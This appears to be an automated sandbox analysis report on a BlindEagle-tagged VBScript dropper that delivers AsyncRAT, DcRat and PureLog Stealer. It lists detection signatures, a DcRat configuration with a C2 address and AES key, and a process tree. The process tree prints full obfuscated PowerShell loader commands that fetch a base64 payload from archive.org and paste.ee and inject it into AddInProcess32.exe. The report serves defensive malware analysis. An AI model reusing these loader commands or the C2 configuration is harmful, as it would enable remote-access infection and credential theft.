Edit tour
Windows
Analysis Report
qiEmGNhUij.vbs
Overview
General Information
| Sample name: | qiEmGNhUij.vbsrenamed because original name is a hash value |
| Original sample name: | 41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7.vbs |
| Analysis ID: | 1523822 |
| MD5: | f182482644ecb63bbc8c1dac4fa0be31 |
| SHA1: | e946d969c0f37ae9b56d4851fd1f3dfa79f3c4a9 |
| SHA256: | 41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7 |
| Tags: | BlindEaglevbsuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
AsyncRAT, DcRat, PureLog Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected DcRat
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 1876 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\qiEmG NhUij.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 1212 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' SWV4KCAoJz knKydqRHVy bCA9IHYnKy dlNWh0Jysn dCcrJ3AnKy dzOi8vaWE2 MCcrJzAxMD AudXMuYScr J3JjaCcrJ2 l2ZS5vJysn cmcvMicrJz QvaXRlbXMv ZGV0YScrJ2 gtJysnbm90 ZS12L0QnKy dldGFoJysn Tm90ZVYudH h0JysndmU1 OycrJzlqRG Jhc2U2NENv JysnbnQnKy dlbnQnKycg PSAoTicrJ2 V3LU9iaicr J2VjJysndC BTeXMnKyd0 ZW0nKycuJy snTmV0Lldl YkNsaWVudC kuRG93bmwn KydvYWRTJy sndHInKydp bmcoOWpEdX InKydsJysn KTs5akRiJy snaW5hJysn cnknKydDJy snb250ZW50 ID0gJysnW1 N5cycrJ3Rl bS4nKydDb2 52ZXJ0XTo6 RnJvbScrJ0 JhJysnc2U2 NFN0cicrJ2 knKyduZygn Kyc5Jysnak RiYXNlNjRD b24nKyd0ZW 4nKyd0KTs5 akRhc3NlbW JseSA9IFtS JysnZWZsZW N0JysnaW9u LkFzc2VtYm wnKyd5XTo6 TG9hZCg5ak QnKydiaW4n KydhcnlDb2 4nKyd0ZW4n Kyd0KTs5ak QnKyd0eXBl ID0gOScrJ2 pEYXNzZW1i JysnbHkuR2 V0JysnVHkn KydwZSh2ZT VSdW5QRS5I b21ldicrJ2 U1KTs5Jysn akQnKydtZX Rob2QgPSA5 aicrJ0R0Jy sneXAnKydl LkdldE1ldG hvZCh2ZTVW QUl2ZTUpOz lqRG1ldCcr J2hvZC4nKy dJbnYnKydv Jysna2UoOW pEbnVsbCcr JywgW29iam VjdCcrJ1sn KyddXUAodm U1MC9NTicr J1RhJysnQS 9kL2VlLmV0 c2FwLy86c3 B0JysndGgn Kyd2ZTUgLC B2ZTVkZXMn KydhdGl2YW RvdmU1ICwg dmU1ZGVzYX RpJysndmFk b3ZlNSAnKy csICcrJ3Zl NWRlc2F0aX YnKydhZG92 JysnZTUsdm UnKyc1QWRk SW4nKydQci crJ29jZScr J3NzMzJ2ZT UsdmU1dmU1 JysnKScrJy knKS5SZVBs YUNlKCc5ak QnLFtzdHJJ TkddW0NoQV JdMzYpLlJl UGxhQ2UoJ3 ZlNScsW3N0 cklOR11bQ2 hBUl0zOSkg KQ==';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic y bypass - NoProfile -command $ OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 3720 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6528 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "Iex( ('9'+'jDur l = v'+'e5 ht'+'t'+'p '+'s://ia6 0'+'0100.u s.a'+'rch' +'ive.o'+' rg/2'+'4/i tems/deta' +'h-'+'not e-v/D'+'et ah'+'NoteV .txt'+'ve5 ;'+'9jDbas e64Co'+'nt '+'ent'+' = (N'+'ew- Obj'+'ec'+ 't Sys'+'t em'+'.'+'N et.WebClie nt).Downl' +'oadS'+'t r'+'ing(9j Dur'+'l'+' );9jDb'+'i na'+'ry'+' C'+'ontent = '+'[Sys '+'tem.'+' Convert]:: From'+'Ba' +'se64Str' +'i'+'ng(' +'9'+'jDba se64Con'+' ten'+'t);9 jDassembly = [R'+'ef lect'+'ion .Assembl'+ 'y]::Load( 9jD'+'bin' +'aryCon'+ 'ten'+'t); 9jD'+'type = 9'+'jDa ssemb'+'ly .Get'+'Ty' +'pe(ve5Ru nPE.Homev' +'e5);9'+' jD'+'metho d = 9j'+'D t'+'yp'+'e .GetMethod (ve5VAIve5 );9jDmet'+ 'hod.'+'In v'+'o'+'ke (9jDnull'+ ', [object '+'['+']]@ (ve50/MN'+ 'Ta'+'A/d/ ee.etsap// :spt'+'th' +'ve5 , ve 5des'+'ati vadove5 , ve5desati' +'vadove5 '+', '+'ve 5desativ'+ 'adov'+'e5 ,ve'+'5Add In'+'Pr'+' oce'+'ss32 ve5,ve5ve5 '+')'+')') .RePlaCe(' 9jD',[strI NG][ChAR]3 6).RePlaCe ('ve5',[st rING][ChAR ]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9) 
AddInProcess32.exe (PID: 1760 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| DCRat | DCRat is a typical RAT that has been around since at least June 2019. | No Attribution |
{"Server": "148.113.165.11", "Ports": "3236", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "V4JA2wRo4wMqThNx0lUpEh05ezE9saTH", "Mutex": "Dggx_gg", "Certificate": "MIICJjCCAY+gAwIBAgIVAKTSE5n95JKjYKaeetJmkZ8WSed/MA0GCSqGSIb3DQEBDQUAMFoxCzAJBgNVBAMMAmdnMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMxMjAzMTAyNjE5WhcNMzQwOTExMTAyNjE5WjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAphKhL5VEa5bZce3HMNoHj07+Nyd8QMtT+YV1vVQeIuxBYfOBrszAxxSRJayhzQwZjw8Du9bw87agBJW06h+GHW8MOufcZ+vKSxmpOL0ze3nUSJiOsfboKa06jcmEpo32D7LTxng9/mAGKb0YGEFUGx88yMDaa+NiBIn/LnWXvaECAwEAAaMyMDAwHQYDVR0OBBYEFMn0HT3AJLPhSr+HTYNM/0589fJ0MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEASB+of3f3t+mAacV7FNg5vwlQhgObMv2su+9BL5KxsQVNsBhluNcrZINzF5jKq/8VafO48B00S1O2MnNHmBXQlZ09Iw8Krvm1hZDmBErHPe0Bwwa5ox6ZpJLnodcOGX2JXMfEY2n/6QC0zva9sGQiyazHOYJRTk5RgJhN7j10nZY=", "ServerSignature": "XjeYWme80rSVhHa/BEFI1k3bRgPGhkJfVbkFLvepbqtufl6cOLxu+woVZZM7psVFdchemmHXVOOta4B/iTyJBzInHTih/neulrIRbgq5zdS22cEhHESwIui1ZS3o5BnYGcZRdZTdXfGH6otoicbOBzdpc41nx3BIOXuL5tRHqjI=", "BDOS": "null", "External_config_on_Pastebin": "false"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
| Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
| Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
| Click to see the 12 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
| Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
| INDICATOR_SUSPICIOUS_EXE_B64_Artifacts | Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attemping to enumerate video devices using WMI | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_EXE_DcRatBy | Detects executables containing the string DcRatBy | ditekSHen |
| |
| Click to see the 15 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||